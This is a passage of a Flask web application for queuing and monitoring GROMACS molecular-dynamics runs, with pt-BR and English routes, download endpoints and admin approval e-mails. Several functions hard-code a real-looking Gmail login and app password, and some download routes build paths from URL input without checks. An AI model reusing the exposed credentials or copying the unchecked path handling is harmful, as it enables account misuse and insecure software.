    Same flow as livre(): POST generates the MD command script, then either
    offers it for download or uploads the structure file and launches the
    run; a run in progress is summarized on every render.

    NOTE(review): nesting reconstructed from whitespace-stripped source —
    confirm against the repository before relying on exact control flow.
    """
    if request.method == 'POST':
        file = request.files.get('file')
        CompleteFileName = generate(file.filename,
                                    request.form.get('campoforca'),
                                    request.form.get('modeloagua'),
                                    request.form.get('tipocaixa'),
                                    request.form.get('distanciacaixa'),
                                    request.form.get('neutralize'),
                                    request.form.get('double'),
                                    request.form.get('ignore'),
                                    current_user
                                    )
        if request.form.get('download') == 'Download':
            return redirect(url_for('commandsdownload',
                                    filename={"complete" : CompleteFileName,
                                              "name": file.filename.split('.')[0]}))
        if request.form.get('execute') == 'Executar':
            if upload_file(file, current_user.username):
                # Check whether this user already has a run executing.
                executing = Config.UPLOAD_FOLDER + current_user.username + '/executing'
                if not os.path.exists(executing):
                    f = open(executing,'w')
                    f.writelines('{}\n'.format(current_user.username))
                    f.close()
                else:
                    flash('The same user is not allowed to perform two simultaneous dynamics.', 'danger')
                    return redirect(url_for('livre_en'))
                # The ligand-run marker must also be free (one run per user total).
                executingLig = Config.UPLOAD_FOLDER + current_user.username + '/executingLig'
                if not os.path.exists(executingLig):
                    f = open(executingLig, 'w')
                    f.close()
                else:
                    flash('The same user is not allowed to perform two simultaneous dynamics.', 'danger')
                    return redirect(url_for('livre_en'))
                # Prepare to execute.
                MoleculeName = file.filename.split('.')[0]
                filename = file.filename
                AbsFileName = os.path.join(Config.UPLOAD_FOLDER,
                                           current_user.username, MoleculeName , 'run',
                                           'logs/', filename)
                exc = execute(AbsFileName, CompleteFileName, current_user.username, MoleculeName)
                # execute() presumably returns (status, command) — TODO confirm.
                flash('There was an error in the command {} with status {}'.format(exc[1],exc[0]), 'danger')
            else:
                flash('File extension is incorrect', 'danger')
    if CheckUserDynamics(current_user.username) == True:
        flash('','steps')
        steplist = CheckDynamicsSteps(current_user.username)
        archive = open(Config.UPLOAD_FOLDER + current_user.username + '/executing', "r")
        lines = archive.readlines()
        archive.close()
        last_line = lines[len(lines)-1]
        # Check whether the run has already reached production MD.
        if last_line == '#productionmd\n':
            # Read the path of the execution log.
            archive = open(Config.UPLOAD_FOLDER + current_user.username+ '/DirectoryLog', 'r')
            directory = archive.readline()
            archive.close()
            # Open the execution log itself.
            archive = open(directory,'r')
            lines = archive.readlines()
            archive.close()
            # Take the last line of the log.
            last_line = lines[len(lines)-1]
            if last_line.find('step ') > -1:
                # Grab the step count and the estimated finish date.
                date_finish = last_line
                archive = open(Config.UPLOAD_FOLDER+current_user.username+'/'+'namedynamic.txt','r')
                name_dynamic = archive.readline()
                archive.close()
                return render_template('livre_en.html', actlivre = 'active', steplist=steplist, name_dynamic=name_dynamic, date_finish=date_finish)
            # NOTE(review): the log file was already closed above — this extra
            # close is redundant but harmless.
            archive.close()
        archive = open(Config.UPLOAD_FOLDER+current_user.username+'/'+'namedynamic.txt','r')
        name_dynamic = archive.readline()
        archive.close()
        return render_template('livre_en.html', actlivre = 'active', steplist=steplist, name_dynamic=name_dynamic)
    return render_template('livre_en.html', actlivre = 'active')
#######################
##### ligante br #####
@app.route('/ligante', methods=['GET','POST'], endpoint='ligante')
@login_required
def ligante():
    """Protein+ligand dynamics page, pt-BR version.

    POST: takes the structure file plus ligand .itp/.gro files, generates
    the MD command script, then either offers it for download or uploads
    everything and launches the run. A run in progress is summarized on
    every render (step list; finish estimate once in production MD).

    NOTE(review): nesting reconstructed from whitespace-stripped source —
    confirm against the repository before relying on exact control flow.
    """
    if request.method == 'POST':
        file = request.files.get('file')
        fileitp = request.files.get('fileitp')
        filegro = request.files.get('filegro')
        CompleteFileName = generateLig(file.filename,
                                       fileitp.filename,
                                       filegro.filename,
                                       request.form.get('campoforca'),
                                       request.form.get('modeloagua'),
                                       request.form.get('tipocaixa'),
                                       request.form.get('distanciacaixa'),
                                       request.form.get('neutralize'),
                                       request.form.get('double'),
                                       request.form.get('ignore'),
                                       current_user
                                       )
        if request.form.get('download') == 'Download':
            name = file.filename.split('.')[0]+'_'+fileitp.filename.split('.')[0]
            return redirect(url_for('commandsdownload',
                                    filename={"complete" : CompleteFileName,
                                              "name": name}))
        if request.form.get('execute') == 'Executar':
            if upload_file_ligante(file, fileitp, filegro, current_user.username): # upload, save and validate the files
                # Check whether this user already has a ligand run executing.
                executingLig = Config.UPLOAD_FOLDER + current_user.username + '/executingLig'
                if not os.path.exists(executingLig):
                    f = open(executingLig,'w')
                    f.writelines('{}\n'.format(current_user.username))
                    f.close()
                else:
                    flash('Não é permitido que o mesmo usuário realize duas dinâmicas simultâneas.', 'danger')
                    return redirect(url_for('ligante'))
                # The free-run marker must also be free (one run per user total).
                executing = Config.UPLOAD_FOLDER + current_user.username + '/executing'
                if not os.path.exists(executing):
                    f = open(executing, 'w')
                    f.close()
                else:
                    flash('Não é permitido que o mesmo usuário realize duas dinâmicas simultâneas.', 'danger')
                    return redirect(url_for('ligante'))
                # Prepare to execute.
                MoleculeName = file.filename.split('.')[0]
                liganteitpName = fileitp.filename.split('.')[0]
                ligantegroName = filegro.filename.split('.')[0]
                moleculaLig = MoleculeName+'_'+liganteitpName
                AbsFileName = os.path.join(Config.UPLOAD_FOLDER,
                                           current_user.username,moleculaLig, 'run',
                                           'logs/', moleculaLig)
                exc = executelig(AbsFileName, CompleteFileName, current_user.username, moleculaLig, fileitp.filename, filegro.filename, MoleculeName)
                # executelig() presumably returns (status, command) — TODO confirm.
                flash('Ocorreu um erro no comando {} com status {}'.format(exc[1],exc[0]), 'danger')
                return redirect(url_for('ligante'))
            else:
                flash('A extensão dos arquivos está incorreta', 'danger')
    if CheckUserDynamicsLig(current_user.username) == True:
        flash('','steps')
        steplist = CheckDynamicsStepsLig(current_user.username)
        archive = open(Config.UPLOAD_FOLDER + current_user.username + '/executingLig','r')
        lines = archive.readlines()
        archive.close()
        last_line = lines[len(lines)-1]
        # Check whether the run has already reached production MD.
        if last_line == '#productionmd\n':
            # Read the path of the execution log.
            archive = open(Config.UPLOAD_FOLDER + current_user.username + '/DirectoryLog', 'r')
            directory = archive.readline()
            archive.close()
            # Open the execution log itself.
            archive = open(directory,'r')
            lines = archive.readlines()
            archive.close()
            # Take the last line of the log.
            last_line = lines[len(lines)-1]
            if last_line.find('step ') > -1:
                # Grab the step count and the estimated finish date.
                date_finish = last_line
                archive = open(Config.UPLOAD_FOLDER+current_user.username+'/'+'namedynamic.txt','r')
                name_dynamic = archive.readline()
                archive.close()
                return render_template('ligante.html', actlig = 'active', steplist=steplist, name_dynamic=name_dynamic, date_finish=date_finish)
        archive = open(Config.UPLOAD_FOLDER+current_user.username+'/'+'namedynamic.txt','r')
        name_dynamic = archive.readline()
        archive.close()
        return render_template('ligante.html', actlig = 'active', steplist=steplist, name_dynamic=name_dynamic)
    return render_template('ligante.html', actlig = 'active')
###################
########## ligante en #############
@app.route('/ligante_en', methods=['GET','POST'], endpoint='ligante_en')
@login_required
def ligante_en():
    """Protein + ligand molecular-dynamics page (English UI).

    POST: reads the molecule, .itp and .gro uploads, builds the GROMACS
    command file via generateLig(), then either redirects to the download
    endpoint or launches the run with executelig(). Two per-user lock
    files ('executingLig' and 'executing') under the user's upload folder
    prevent a second simultaneous dynamics by the same user.
    GET (and POST fall-through): renders the page; when a run is in
    progress the completed step list is shown and, once the lock file's
    last line is '#productionmd', the latest 'step' line of the GROMACS
    log is shown as the estimated finish.
    """
    if request.method == 'POST':
        file = request.files.get('file')
        fileitp = request.files.get('fileitp')
        filegro = request.files.get('filegro')
        # Generate the command file from the uploaded names and form options.
        CompleteFileName = generateLig(file.filename,
                                       fileitp.filename,
                                       filegro.filename,
                                       request.form.get('campoforca'),
                                       request.form.get('modeloagua'),
                                       request.form.get('tipocaixa'),
                                       request.form.get('distanciacaixa'),
                                       request.form.get('neutralize'),
                                       request.form.get('double'),
                                       request.form.get('ignore'),
                                       current_user
                                       )
        if request.form.get('download') == 'Download':
            # Offer the generated command file for download instead of running.
            name = file.filename.split('.')[0]+'_'+fileitp.filename.split('.')[0]
            return redirect(url_for('commandsdownload',
                                    filename={"complete" : CompleteFileName,
                                              "name": name}))
        # NOTE(review): the button value is 'Executar' (Portuguese) even on
        # the English page — presumably shared template markup; confirm.
        if request.form.get('execute') == 'Executar':
            if upload_file_ligante(file, fileitp, filegro, current_user.username): # upload the files, save and validate their extensions
                # First lock file: ligand dynamics. Its first line records the username.
                executingLig = Config.UPLOAD_FOLDER + current_user.username + '/executingLig'
                if not os.path.exists(executingLig):
                    f = open(executingLig,'w')
                    f.writelines('{}\n'.format(current_user.username))
                    f.close()
                else:
                    flash('The same user is not allowed to perform two simultaneous dynamics.', 'danger')
                    return redirect(url_for('ligante_en'))
                # Second lock file: shared with the free-enzyme workflow.
                executing = Config.UPLOAD_FOLDER + current_user.username + '/executing'
                if not os.path.exists(executing):
                    f = open(executing, 'w')
                    f.close()
                else:
                    flash('The same user is not allowed to perform two simultaneous dynamics.', 'danger')
                    return redirect(url_for('ligante_en'))
                # Prepare names/paths for execution (base names without extension).
                MoleculeName = file.filename.split('.')[0]
                liganteitpName = fileitp.filename.split('.')[0]
                ligantegroName = filegro.filename.split('.')[0]
                moleculaLig = MoleculeName+'_'+liganteitpName
                AbsFileName = os.path.join(Config.UPLOAD_FOLDER,
                                           current_user.username,moleculaLig, 'run',
                                           'logs/', moleculaLig)
                # executelig() returns (status, command) — flashed below as an error report.
                exc = executelig(AbsFileName, CompleteFileName, current_user.username, moleculaLig, fileitp.filename, filegro.filename, MoleculeName)
                flash('There was an error in the command {} with status {}'.format(exc[1],exc[0]), 'danger')
                return redirect(url_for('ligante_en'))
            else:
                flash('The file extension is incorrect', 'danger')
    # GET view (or POST without execution): report progress when a run exists.
    if CheckUserDynamicsLig(current_user.username) == True:
        flash('','steps')
        steplist = CheckDynamicsStepsLig(current_user.username)
        archive = open(Config.UPLOAD_FOLDER + current_user.username + '/executingLig','r')
        lines = archive.readlines()
        archive.close()
        last_line = lines[len(lines)-1]
        # Check whether the run has already reached the production-MD stage.
        if last_line == '#productionmd\n':
            # Read the path of the execution log.
            archive = open(Config.UPLOAD_FOLDER + current_user.username + '/DirectoryLog', 'r')
            directory = archive.readline()
            archive.close()
            # Read the execution log itself.
            archive = open(directory,'r')
            lines = archive.readlines()
            archive.close()
            # Take the last line of the log.
            last_line = lines[len(lines)-1]
            if last_line.find('step ') > -1:
                # The line carries the step count and the estimated finish date.
                date_finish = last_line
                archive = open(Config.UPLOAD_FOLDER+current_user.username+'/'+'namedynamic.txt','r')
                name_dynamic = archive.readline()
                archive.close()
                return render_template('ligante_en.html', actlig = 'active', steplist=steplist, name_dynamic=name_dynamic, date_finish=date_finish)
        archive = open(Config.UPLOAD_FOLDER+current_user.username+'/'+'namedynamic.txt','r')
        name_dynamic = archive.readline()
        archive.close()
        return render_template('ligante_en.html', actlig = 'active', steplist=steplist, name_dynamic=name_dynamic)
    return render_template('ligante_en.html', actlig = 'active')
#######################
###### ligante ACPYPE BR ######
##### ligante br #####
@app.route('/liganteACPYPE', methods=['GET','POST'], endpoint='liganteACPYPE')
@login_required
def liganteACPYPE():
    """Protein + ligand dynamics using an ACPYPE-generated topology (pt-BR UI).

    Same flow as the plain ligand route: build the command file with
    generateLigACPYPE(), offer it for download or run it with
    executeLigACPYPE(), guarded by the per-user 'executingLig'/'executing'
    lock files; on GET, report progress of any running dynamics.
    """
    if request.method == 'POST':
        file = request.files.get('file')
        fileitp = request.files.get('fileitp')
        filegro = request.files.get('filegro')
        # Generate the ACPYPE command file from the uploads and form options.
        CompleteFileName = generateLigACPYPE(file.filename,
                                             fileitp.filename,
                                             filegro.filename,
                                             request.form.get('campoforca'),
                                             request.form.get('modeloagua'),
                                             request.form.get('tipocaixa'),
                                             request.form.get('distanciacaixa'),
                                             request.form.get('neutralize'),
                                             request.form.get('double'),
                                             request.form.get('ignore'),
                                             current_user
                                             )
        if request.form.get('download') == 'Download':
            name = file.filename.split('.')[0]+'_'+fileitp.filename.split('.')[0]
            return redirect(url_for('commandsdownload',
                                    filename={"complete" : CompleteFileName,
                                              "name": name}))
        if request.form.get('execute') == 'Executar':
            if upload_file_ligante(file, fileitp, filegro, current_user.username): # upload the files, save and validate their extensions
                # Lock file for ligand dynamics; first line records the username.
                executingLig = Config.UPLOAD_FOLDER + current_user.username + '/executingLig'
                if not os.path.exists(executingLig):
                    f = open(executingLig,'w')
                    f.writelines('{}\n'.format(current_user.username))
                    f.close()
                else:
                    flash('Não é permitido que o mesmo usuário realize duas dinâmicas simultâneas.', 'danger')
                    return redirect(url_for('liganteACPYPE'))
                # Lock file shared with the free-enzyme workflow.
                executing = Config.UPLOAD_FOLDER + current_user.username + '/executing'
                if not os.path.exists(executing):
                    f = open(executing, 'w')
                    f.close()
                else:
                    flash('Não é permitido que o mesmo usuário realize duas dinâmicas simultâneas.', 'danger')
                    return redirect(url_for('liganteACPYPE'))
                # Prepare names/paths for execution (base names without extension).
                MoleculeName = file.filename.split('.')[0]
                liganteitpName = fileitp.filename.split('.')[0]
                ligantegroName = filegro.filename.split('.')[0]
                moleculaLig = MoleculeName+'_'+liganteitpName
                AbsFileName = os.path.join(Config.UPLOAD_FOLDER,
                                           current_user.username,moleculaLig, 'run',
                                           'logs/', moleculaLig)
                # NOTE(review): unlike executelig(), this runner receives the .gro
                # BASE name (ligantegroName, no extension) — confirm intended.
                exc = executeLigACPYPE(AbsFileName, CompleteFileName, current_user.username, moleculaLig, fileitp.filename, ligantegroName, MoleculeName)
                flash('Ocorreu um erro no comando {} com status {}'.format(exc[1],exc[0]), 'danger')
                return redirect(url_for('liganteACPYPE'))
            else:
                flash('A extensão dos arquivos está incorreta', 'danger')
    # GET view (or POST without execution): report progress when a run exists.
    if CheckUserDynamicsLig(current_user.username) == True:
        flash('','steps')
        steplist = CheckDynamicsStepsLig(current_user.username)
        archive = open(Config.UPLOAD_FOLDER + current_user.username + '/executingLig','r')
        lines = archive.readlines()
        archive.close()
        last_line = lines[len(lines)-1]
        # Check whether the run has already reached the production-MD stage.
        if last_line == '#productionmd\n':
            # Read the path of the execution log.
            archive = open(Config.UPLOAD_FOLDER + current_user.username + '/DirectoryLog', 'r')
            directory = archive.readline()
            archive.close()
            # Read the execution log itself.
            archive = open(directory,'r')
            lines = archive.readlines()
            archive.close()
            # Take the last line of the log.
            last_line = lines[len(lines)-1]
            if last_line.find('step ') > -1:
                # The line carries the step count and the estimated finish date.
                date_finish = last_line
                archive = open(Config.UPLOAD_FOLDER+current_user.username+'/'+'namedynamic.txt','r')
                name_dynamic = archive.readline()
                archive.close()
                return render_template('liganteACPYPE.html', actligACPYPE = 'active', steplist=steplist, name_dynamic=name_dynamic, date_finish=date_finish)
        archive = open(Config.UPLOAD_FOLDER+current_user.username+'/'+'namedynamic.txt','r')
        name_dynamic = archive.readline()
        archive.close()
        return render_template('liganteACPYPE.html', actligACPYPE = 'active', steplist=steplist, name_dynamic=name_dynamic)
    return render_template('liganteACPYPE.html', actligACPYPE = 'active')
###################
##### ligante ACPYPE en #####
@app.route('/liganteACPYPE_en', methods=['GET','POST'], endpoint='liganteACPYPE_en')
@login_required
def liganteACPYPE_en():
    """English route of the ACPYPE protein + ligand dynamics page.

    Mirrors liganteACPYPE() but renders the *_en templates.
    NOTE(review): the flash messages below are still in Portuguese even
    though this is the English route — likely a copy-paste leftover;
    confirm with the maintainers before translating (user-facing text).
    """
    if request.method == 'POST':
        file = request.files.get('file')
        fileitp = request.files.get('fileitp')
        filegro = request.files.get('filegro')
        # Generate the ACPYPE command file from the uploads and form options.
        CompleteFileName = generateLigACPYPE(file.filename,
                                             fileitp.filename,
                                             filegro.filename,
                                             request.form.get('campoforca'),
                                             request.form.get('modeloagua'),
                                             request.form.get('tipocaixa'),
                                             request.form.get('distanciacaixa'),
                                             request.form.get('neutralize'),
                                             request.form.get('double'),
                                             request.form.get('ignore'),
                                             current_user
                                             )
        if request.form.get('download') == 'Download':
            name = file.filename.split('.')[0]+'_'+fileitp.filename.split('.')[0]
            return redirect(url_for('commandsdownload',
                                    filename={"complete" : CompleteFileName,
                                              "name": name}))
        if request.form.get('execute') == 'Executar':
            if upload_file_ligante(file, fileitp, filegro, current_user.username): # upload the files, save and validate their extensions
                # Lock file for ligand dynamics; first line records the username.
                executingLig = Config.UPLOAD_FOLDER + current_user.username + '/executingLig'
                if not os.path.exists(executingLig):
                    f = open(executingLig,'w')
                    f.writelines('{}\n'.format(current_user.username))
                    f.close()
                else:
                    flash('Não é permitido que o mesmo usuário realize duas dinâmicas simultâneas.', 'danger')
                    return redirect(url_for('liganteACPYPE_en'))
                # Lock file shared with the free-enzyme workflow.
                executing = Config.UPLOAD_FOLDER + current_user.username + '/executing'
                if not os.path.exists(executing):
                    f = open(executing, 'w')
                    f.close()
                else:
                    flash('Não é permitido que o mesmo usuário realize duas dinâmicas simultâneas.', 'danger')
                    return redirect(url_for('liganteACPYPE_en'))
                # Prepare names/paths for execution (base names without extension).
                MoleculeName = file.filename.split('.')[0]
                liganteitpName = fileitp.filename.split('.')[0]
                ligantegroName = filegro.filename.split('.')[0]
                moleculaLig = MoleculeName+'_'+liganteitpName
                AbsFileName = os.path.join(Config.UPLOAD_FOLDER,
                                           current_user.username,moleculaLig, 'run',
                                           'logs/', moleculaLig)
                # NOTE(review): receives the .gro BASE name (no extension),
                # matching liganteACPYPE() — confirm intended.
                exc = executeLigACPYPE(AbsFileName, CompleteFileName, current_user.username, moleculaLig, fileitp.filename, ligantegroName, MoleculeName)
                flash('Ocorreu um erro no comando {} com status {}'.format(exc[1],exc[0]), 'danger')
                return redirect(url_for('liganteACPYPE_en'))
            else:
                flash('A extensão dos arquivos está incorreta', 'danger')
    # GET view (or POST without execution): report progress when a run exists.
    if CheckUserDynamicsLig(current_user.username) == True:
        flash('','steps')
        steplist = CheckDynamicsStepsLig(current_user.username)
        archive = open(Config.UPLOAD_FOLDER + current_user.username + '/executingLig','r')
        lines = archive.readlines()
        archive.close()
        last_line = lines[len(lines)-1]
        # Check whether the run has already reached the production-MD stage.
        if last_line == '#productionmd\n':
            # Read the path of the execution log.
            archive = open(Config.UPLOAD_FOLDER + current_user.username + '/DirectoryLog', 'r')
            directory = archive.readline()
            archive.close()
            # Read the execution log itself.
            archive = open(directory,'r')
            lines = archive.readlines()
            archive.close()
            # Take the last line of the log.
            last_line = lines[len(lines)-1]
            if last_line.find('step ') > -1:
                # The line carries the step count and the estimated finish date.
                date_finish = last_line
                archive = open(Config.UPLOAD_FOLDER+current_user.username+'/'+'namedynamic.txt','r')
                name_dynamic = archive.readline()
                archive.close()
                return render_template('liganteACPYPE_en.html', actligACPYPE = 'active', steplist=steplist, name_dynamic=name_dynamic, date_finish=date_finish)
        archive = open(Config.UPLOAD_FOLDER+current_user.username+'/'+'namedynamic.txt','r')
        name_dynamic = archive.readline()
        archive.close()
        return render_template('liganteACPYPE_en.html', actligACPYPE = 'active', steplist=steplist, name_dynamic=name_dynamic)
    return render_template('liganteACPYPE_en.html', actligACPYPE = 'active')
###################
#############################
##### liganteATB br #####
@app.route('/liganteATB', methods=['GET','POST'], endpoint='liganteATB')
@login_required
def liganteATB():
    """Placeholder for the ATB-topology ligand workflow (pt-BR) — not implemented yet."""
    notice = 'Esta funcionalidade está em desenvolvimento'
    flash(notice, 'danger')
    return render_template('liganteATB.html', actligATB='active')
##################
###### liganteATB en ######
@app.route('/liganteATB_en', methods=['GET','POST'], endpoint='liganteATB_en')
@login_required
def liganteATB_en():
    """Placeholder for the ATB-topology ligand workflow (English) — not implemented yet."""
    notice = 'This feature is in development'
    flash(notice, 'danger')
    return render_template('liganteATB_en.html', actligATB='active')
##############
@app.route('/imgfiles/<filename>')
@login_required
def imgsdownload(filename):
    """Zip the .xvg graph files of a dynamics run and send the archive.

    `filename` arrives as "<index> <dynamic-name>"; only the part after
    the first space is the dynamics folder name.
    """
    filename = filename.split(' ')[1]
    current_location = os.path.join(Config.UPLOAD_FOLDER, current_user.username, filename, 'graficos')
    ziplocation = os.path.join(current_location, filename+'-graficos.zip')
    # Move every .xvg produced by the run into the 'graficos' folder.
    directory_xvg = os.path.join(Config.UPLOAD_FOLDER, current_user.username, filename, 'run')
    for folder, subfolders, files in os.walk(directory_xvg):
        for file in files:
            if file.endswith('.xvg'):
                # BUG FIX: join with the folder os.walk reported so .xvg
                # files inside subdirectories of 'run' are moved too (the
                # old code joined every file name onto 'run' directly,
                # which fails for nested files).
                shutil.move(os.path.join(folder, file), current_location)
    # 'with' guarantees the zip is closed/flushed even if zf.write raises.
    with zipfile.ZipFile(ziplocation, 'w') as zf:
        for folder, subfolders, files in os.walk(current_location):
            for file in files:
                if not file.endswith('.zip'):
                    zf.write(os.path.join(folder, file), file, compress_type=zipfile.ZIP_DEFLATED)
    return send_file(ziplocation, as_attachment=True)
@app.route('/downloadmdpfiles')
@login_required
def downloadmdpfiles():
    """Zip every .mdp parameter file and send the archive to the user."""
    ziplocation = os.path.join(Config.UPLOAD_FOLDER, current_user.username, 'mdpfiles.zip')
    # BUG FIX: os.chdir() returns None, so the old
    # os.listdir(os.chdir(...)) only worked because listdir(None) happens
    # to list the cwd. List the folder explicitly; chdir is kept so
    # zf.write(file) stores bare (archive-relative) names as before.
    os.chdir(Config.MDP_LOCATION_FOLDER)
    mdplist = os.listdir(Config.MDP_LOCATION_FOLDER)
    # 'with' guarantees the zip is closed even if a write fails.
    with zipfile.ZipFile(ziplocation, 'w') as zf:
        for file in mdplist:
            if file.endswith('.mdp'):
                zf.write(file, compress_type=zipfile.ZIP_DEFLATED)
    return send_file(ziplocation, as_attachment=True)
@app.route('/dynamiccomandsdownload/<filename>')
@login_required
def dynamiccomandsdownload(filename):
    """Send the most recently modified *.txt command file of a dynamics run."""
    filename = filename.split(' ')[1]
    base_dir = Config.UPLOAD_FOLDER + '/' + current_user.username + '/' + filename
    os.chdir(base_dir)
    # Newest .txt by modification time (glob runs relative to base_dir).
    candidates = sorted(glob.glob("*.txt"), key=os.path.getmtime)
    newest = candidates[-1]
    return send_file(base_dir + '/' + newest, as_attachment=True)
@app.route('/download/<filename>')
@login_required
def commandsdownload(filename):
    """Send a generated command file.

    `filename` is the repr of a dict with keys "name" (dynamics folder)
    and "complete" (command-file name); literal_eval rebuilds it safely.
    """
    info = ast.literal_eval(filename)
    path = '{}{}/{}/{}'.format(Config.UPLOAD_FOLDER, current_user.username,
                               info["name"], info["complete"])
    return send_file(path, as_attachment=True)
@app.route('/downloadlogs/<filename>')
@login_required
def downloalogs(filename):
    """Zip the run logs of a dynamics and send the archive.

    `filename` arrives as "<index> <dynamic-name>"; only the part after
    the first space is the dynamics folder name.
    """
    filename = filename.split(' ')[1]
    current_location = os.path.join(Config.UPLOAD_FOLDER, current_user.username, filename, 'run', 'logs')
    ziplocation = os.path.join(current_location, filename+'-logs.zip')
    # FIX: 'with' guarantees the zip handle is closed/flushed even if a
    # write raises (the old code leaked the handle on error).
    with zipfile.ZipFile(ziplocation, 'w') as zf:
        for folder, subfolders, files in os.walk(current_location):
            for file in files:
                if not file.endswith('.zip'):
                    zf.write(os.path.join(folder, file), file, compress_type=zipfile.ZIP_DEFLATED)
    return send_file(ziplocation, as_attachment=True)
@login_manager.unauthorized_handler
def unauthorized_handler():
    """Route unauthenticated visitors through the logout flow (→ login page)."""
    target = url_for('logout')
    return redirect(target)
@app.route('/logout')
def logout():
    """End the current session and return to the login page."""
    logout_user()
    login_page = url_for('login')
    return redirect(login_page)
###### admin br ######
@app.route('/admin', methods=['GET', 'POST'], endpoint='admin')
@admin_required
def admin():
    """Admin dashboard (pt-BR): lists every activated user account."""
    activated_users = User.query.filter(User.register == 'True')
    return render_template('admin.html', actadmin='active', UserData=activated_users)
#####################
###### admin en #####
@app.route('/admin_en', methods=['GET', 'POST'], endpoint='admin_en')
@admin_required
def admin_en():
    """Admin dashboard (English): lists every activated user account."""
    activated_users = User.query.filter(User.register == 'True')
    return render_template('admin_en.html', actadmin='active', UserData=activated_users)
#####################
##### admin cadastro br #####
@app.route('/admin/cadastros', methods=['GET', 'POST'], endpoint='admin_cadastro')
@admin_required
def admin_cadastros():
    """Pending-registration page (pt-BR): accounts awaiting approval."""
    pending = User.query.filter(User.register == 'False')
    return render_template('admin_cadastros.html', NewUserData=pending)
#############################
###### admin cadastro en ######
@app.route('/admin/cadastros_en', methods=['GET', 'POST'], endpoint='admin_cadastro_en')
@admin_required
def admin_cadastros_en():
    """Pending-registration page (English): accounts awaiting approval."""
    pending = User.query.filter(User.register == 'False')
    return render_template('admin_cadastros_en.html', NewUserData=pending)
#############################
############# new user ################
@app.route('/admin/accept_newUser/<int:id>', methods=['GET', 'POST'])
@admin_required
def accept_newUser(id):
    """Approve a pending registration (pt-BR) and notify the user by e-mail.

    Activates the account, e-mails an approval notice, then returns to the
    pending-registrations page with a success flash.
    """
    # Activate the user's registration.
    UserData = User.query.get(int(id))
    UserData.register = 'True'
    name = UserData.name
    email = UserData.email
    db.session.add(UserData)
    db.session.commit()
    msg = MIMEText('<h3>Olá '+ name +', seu cadastro no Visual Dynamics foi aprovado.</h3>\
    Acesse http://157.86.248.13:8080 para utilizar o sistema.\
    <h5>E-mail gerado automáticamente, por favor não responder.</h5>','html', 'utf-8')
    # TODO: create an official system e-mail account for the sender.
    msg['From'] = 'LABIOQUIM FIOCRUZ - RO'
    msg['To'] = email
    msg['Subject'] = 'Cadastro Visual Dynamics'
    message = msg.as_string()
    # FIX: use the SMTP connection as a context manager so it is always
    # closed, even when login/sendmail raises (the old code leaked the
    # connection on failure). __exit__ issues QUIT, as server.quit() did.
    # SECURITY: credentials are hard-coded in source; move them to
    # configuration/environment variables.
    with smtplib.SMTP_SSL('smtp.gmail.com', 465) as server:
        server.login("labioquim.rondonia.fiocruz@gmail.com", "ietcbybgbiiyfrko")
        server.sendmail("labioquim.rondonia.fiocruz@gmail.com", email, message)
    flash('Solicitação de cadastro do(a) usuário(a) {} aceita com sucesso.'.format(UserData.username), 'primary')
    return redirect(url_for('admin_cadastros'))
#####################################
############# new user en ###########
@app.route('/admin/accept_newUser_en/<int:id>', methods=['GET', 'POST'])
@admin_required
def accept_newUser_en(id):
    """Approve a pending registration (English) and notify the user by e-mail."""
    # Activate the user's registration.
    UserData = User.query.get(int(id))
    UserData.register = 'True'
    name = UserData.name
    email = UserData.email
    db.session.add(UserData)
    db.session.commit()
    msg = MIMEText('<h3>Hi '+ name +', your Visual Dynamics registration has been approved.</h3>\
    Acess http://157.86.248.13:8080 to use the System.\
    <h5>Automatically generated email, please dont answer.</h5>','html', 'utf-8')
    # TODO: create an official system e-mail account for the sender.
    msg['From'] = 'LABIOQUIM FIOCRUZ - RO'
    msg['To'] = email
    msg['Subject'] = 'Visual Dynamics Register'
    message = msg.as_string()
    # FIX: context-managed SMTP connection — always closed, even when
    # login/sendmail raises (the old code leaked the connection on failure).
    # SECURITY: credentials are hard-coded in source; move them to
    # configuration/environment variables.
    with smtplib.SMTP_SSL('smtp.gmail.com', 465) as server:
        server.login("labioquim.rondonia.fiocruz@gmail.com", "ietcbybgbiiyfrko")
        server.sendmail("labioquim.rondonia.fiocruz@gmail.com", email, message)
    flash('User registration request {} successfully accepted.'.format(UserData.username), 'primary')
    return redirect(url_for('admin_cadastros_en'))
#####################################
####### admin_remove_br #########
@app.route('/admin/remove_newUser/<int:id>')
@admin_required
def remove_newUser(id):
    """Reject a pending registration (pt-BR): delete it and e-mail the applicant."""
    UserData = User.query.get(int(id))
    name = UserData.name
    email = UserData.email
    db.session.delete(UserData)
    db.session.commit()
    msg = MIMEText('<h3>Olá '+ name +', seu cadastro no Visual Dynamics não foi aprovado.</h3>\
    Acesse http://157.86.248.13:8080 para tentar novamente.\
    <h5>E-mail gerado automáticamente, por favor não responder.</h5>','html', 'utf-8')
    # TODO: create an official system e-mail account for the sender.
    msg['From'] = 'labioquim.rondonia.fiocruz@gmail.com'
    msg['To'] = email
    msg['Subject'] = 'Cadastro Visual Dynamics'
    message = msg.as_string()
    # FIX: context-managed SMTP connection — always closed, even when
    # login/sendmail raises (the old code leaked the connection on failure).
    # SECURITY: credentials are hard-coded in source; move them to
    # configuration/environment variables.
    with smtplib.SMTP_SSL('smtp.gmail.com', 465) as server:
        server.login("labioquim.rondonia.fiocruz@gmail.com", "ietcbybgbiiyfrko")
        server.sendmail("labioquim.rondonia.fiocruz@gmail.com", email, message)
    flash('Solicitação de cadastro do(a) usuário(a) {} removida com sucesso.'.format(UserData.username), 'primary')
    return redirect(url_for('admin_cadastros'))
################################
##### admin remove en ########
@app.route('/admin/remove_newUser_en/<int:id>')
@admin_required
def remove_newUser_en(id):
    """Reject a pending registration (English): delete it and e-mail the applicant.

    NOTE(review): the e-mail subject is still the Portuguese
    'Cadastro Visual Dynamics' on this English route — confirm intended.
    """
    UserData = User.query.get(int(id))
    name = UserData.name
    email = UserData.email
    db.session.delete(UserData)
    db.session.commit()
    msg = MIMEText('<h3>Hi '+ name +', your Visual Dynamics registration has not been approved.</h3>\
    Acess http://157.86.248.13:8080 to try again.\
    <h5>Automatically generated email, please dont answer.</h5>','html', 'utf-8')
    # TODO: create an official system e-mail account for the sender.
    msg['From'] = 'labioquim.rondonia.fiocruz@gmail.com'
    msg['To'] = email
    msg['Subject'] = 'Cadastro Visual Dynamics'
    message = msg.as_string()
    # FIX: context-managed SMTP connection — always closed, even when
    # login/sendmail raises (the old code leaked the connection on failure).
    # SECURITY: credentials are hard-coded in source; move them to
    # configuration/environment variables.
    with smtplib.SMTP_SSL('smtp.gmail.com', 465) as server:
        server.login("labioquim.rondonia.fiocruz@gmail.com", "ietcbybgbiiyfrko")
